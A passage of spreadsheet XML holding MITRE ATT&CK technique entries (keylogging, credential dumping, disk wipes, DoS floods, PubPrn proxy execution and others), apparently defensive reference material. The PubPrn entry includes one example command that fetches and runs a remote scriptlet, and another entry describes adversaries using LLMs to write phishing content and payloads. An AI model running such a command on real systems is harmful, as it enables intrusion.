    <t>Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup) Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596/003</t>
  </si>
  <si>
    <t>T1056.001</t>
  </si>
  <si>
    <t>Keylogging</t>
  </si>
  <si>
    <t>Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks)
https://attack.mitre.org/techniques/T1056/001</t>
  </si>
  <si>
    <t>T1564.012</t>
  </si>
  <si>
    <t>File/Path Exclusions</t>
  </si>
  <si>
    <t>Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions)
Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than  tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.
https://attack.mitre.org/techniques/T1564/012</t>
  </si>
  <si>
    <t>T1222.002</t>
  </si>
  <si>
    <t>Linux and Mac File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: &lt;code&gt;chown&lt;/code&gt; (short for change owner), and &lt;code&gt;chmod&lt;/code&gt; (short for change mode).
Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques)
https://attack.mitre.org/techniques/T1222/002</t>
  </si>
  <si>
    <t>T1110.001</t>
  </si>
  <si>
    <t>Password Guessing</t>
  </si>
  <si>
    <t>Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)
Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:
* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP &amp; 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP &amp; 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
* SNMP (161/UDP and 162/TCP/UDP)
In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)
In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.
https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>PubPrn</t>
  </si>
  <si>
    <t>Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via &lt;code&gt;Cscript.exe&lt;/code&gt;. For example, the following code publishes a printer within the specified domain: &lt;code&gt;cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com&lt;/code&gt;.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second &lt;code&gt;script:&lt;/code&gt; parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is &lt;code&gt;pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct&lt;/code&gt;. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), &lt;code&gt;PubPrn.vbs&lt;/code&gt; has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to &lt;code&gt;LDAP://&lt;/code&gt;, vice the &lt;code&gt;script:&lt;/code&gt; moniker which could be used to reference remote code via HTTP(S).
https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>T1597.002</t>
  </si>
  <si>
    <t>Purchase Technical Data</t>
  </si>
  <si>
    <t>Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1597/002</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
https://attack.mitre.org/techniques/T1003</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>Shared Modules</t>
  </si>
  <si>
    <t>Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).
Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.
The Linux &amp; macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in `dlfcn.h` in functions such as `dlopen` and `dlsym`. Although macOS can execute `.so` files, common practice uses `.dylib` files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017)
The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in `NTDLL.dll` and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like `LoadLibrary` at run time.(Citation: Microsoft DLL)
https://attack.mitre.org/techniques/T1129</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
https://attack.mitre.org/techniques/T1602</t>
  </si>
  <si>
    <t>T1561.002</t>
  </si>
  <si>
    <t>Disk Structure Wipe</t>
  </si>
  <si>
    <t>Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. 
Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) if all sectors of a disk are wiped.
On a network devices, adversaries may reformat the file system using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `format`.(Citation: format_cmd_cisco)
To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
https://attack.mitre.org/techniques/T1561/002</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Direct Network Flood</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
https://attack.mitre.org/techniques/T1498/001</t>
  </si>
  <si>
    <t>T1574.007</t>
  </si>
  <si>
    <t>Path Interception by PATH Environment Variable</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line. 
Adversaries can place a malicious program in an earlier entry in the list of directories stored in the PATH environment variable, resulting in the operating system executing the malicious binary rather than the legitimate binary when it searches sequentially through that PATH listing.
For example, on Windows if an adversary places a malicious program named "net.exe" in `C:\example path`, which by default precedes `C:\Windows\system32\net.exe` in the PATH environment variable, when "net" is executed from the command-line the `C:\example path` will be called instead of the system's legitimate executable at `C:\Windows\system32\net.exe`. Some methods of executing a program rely on the PATH environment variable to determine the locations that are searched when the path for the program is not given, such as executing programs from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: ExpressVPN PATH env Windows 2021)
Adversaries may also directly modify the $PATH variable specifying the directories to be searched.  An adversary can modify the `$PATH` variable to point to a directory they have write access. When a program using the $PATH variable is called, the OS searches the specified directory and executes the malicious binary. On macOS, this can also be performed through modifying the $HOME variable. These variables can be modified using the command-line, launchctl, [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or modifying the `/etc/paths.d` folder contents.(Citation: uptycs Fake POC linux malware 2023)(Citation: nixCraft macOS PATH variables)(Citation: Elastic Rules macOS launchctl 2022)
https://attack.mitre.org/techniques/T1574/007</t>
  </si>
  <si>
    <t>T1213.002</t>
  </si>
  <si>
    <t>Sharepoint</t>
  </si>
  <si>
    <t>Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
* Policies, procedures, and standards
* Physical / logical network diagrams
* System architecture diagrams
* Technical system documentation
* Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
* Work / project schedules
* Source code snippets
* Links to network shares and other internal resources
https://attack.mitre.org/techniques/T1213/002</t>
  </si>
  <si>
    <t>T1006</t>
  </si>
  <si>
    <t>Direct Volume Access</t>
  </si>
  <si>
    <t>Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)
https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>T1588.007</t>
  </si>
  <si>
    <t>Artificial Intelligence</t>
  </si>
  <si>
    <t>Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI)
For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI)
https://attack.mitre.org/techniques/T1588/007</t>
  </si>
  <si>
    <t>T1666</t>
  </si>
  <si>
    <t>Modify Cloud Resource Hierarchy</t>
  </si>
  <si>
    <t>Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.  
IaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)
Adversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)
In AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)
https://attack.mitre.org/techniques/T1666</t>
  </si>
  <si>
    <t>T1564.008</t>
  </si>
  <si>
    <t>Email Hiding Rules</t>
  </si>
  <si>
    <t>Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the &lt;code&gt;New-InboxRule&lt;/code&gt; or &lt;code&gt;Set-InboxRule&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.
Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as &lt;code&gt;malware&lt;/code&gt;, &lt;code&gt;suspicious&lt;/code&gt;, &lt;code&gt;phish&lt;/code&gt;, and &lt;code&gt;hack&lt;/code&gt;) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)
In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).
https://attack.mitre.org/techniques/T1564/008</t>
  </si>
  <si>
    <t>T1491.002</t>
  </si>
  <si>
    <t>External Defacement</t>
  </si>
  <si>
    <t>An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. [External Defacement](https://attack.mitre.org/techniques/T1491/002) may ultimately cause users to distrust the systems and to question/discredit the system’s integrity. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)
https://attack.mitre.org/techniques/T1491/002</t>
  </si>
  <si>
    <t>T1027.013</t>
  </si>
  <si>
    <t>Encrypted/Encoded File</t>
  </si>
  <si>
    <t>Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.
This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding/compression schemes such as Base64.
The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.
For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) 
Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.
https://attack.mitre.org/techniques/T1027/013</t>
  </si>
  <si>
    <t>T1590.005</t>
  </si>
  <si>
    <t>IP Addresses</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1590/005</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>OS Exhaustion Flood</t>
  </si>
  <si>
    <t>Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
Different ways to achieve this exist, including TCP state-exhaustion attacks such as SYN floods and ACK floods.(Citation: Arbor AnnualDoSreport Jan 2018) With SYN floods, excessive amounts of SYN packets are sent, but the 3-way TCP handshake is never completed. Because each OS has a maximum number of concurrent TCP connections that it will allow, this can quickly exhaust the ability of the system to receive new requests for TCP connections, thus preventing access to any TCP service provided by the server.(Citation: Cloudflare SynFlood)
ACK floods leverage the stateful nature of the TCP protocol. A flood of ACK packets are sent to the target. This forces the OS to search its state table for a related TCP connection that has already been established. Because the ACK packets are for connections that do not exist, the OS will have to search the entire state table to confirm that no match exists. When it is necessary to do this for a large flood of packets, the computational requirements can cause the server to become sluggish and/or unresponsive, due to the work it must do to eliminate the rogue ACK packets. This greatly reduces the resources available for providing the targeted service.(Citation: Corero SYN-ACKflood)
https://attack.mitre.org/techniques/T1499/001</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) 
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
https://attack.mitre.org/techniques/T1014</t>
  </si>
  <si>
    <t>T1546.013</t>
  </si>
  <si>
    <t>PowerShell Profile</t>
  </si>
  <si>
    <t>Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (&lt;code&gt;profile.ps1&lt;/code&gt;) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.
[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles) 
Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the &lt;code&gt;-NoProfile&lt;/code&gt; flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019) 
An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles)
https://attack.mitre.org/techniques/T1546/013</t>
  </si>
  <si>
    <t>T1059.007</t>
  </si>
  <si>
    <t>JavaScript</t>
  </si>
  <si>
    <t>Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)
JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple’s Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple’s OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple’s internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility &lt;code&gt;osascript&lt;/code&gt;, they can be compiled into applications or script files via &lt;code&gt;osacompile&lt;/code&gt;, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)
Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).
https://attack.mitre.org/techniques/T1059/007</t>
  </si>
  <si>
    <t>T1590.002</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
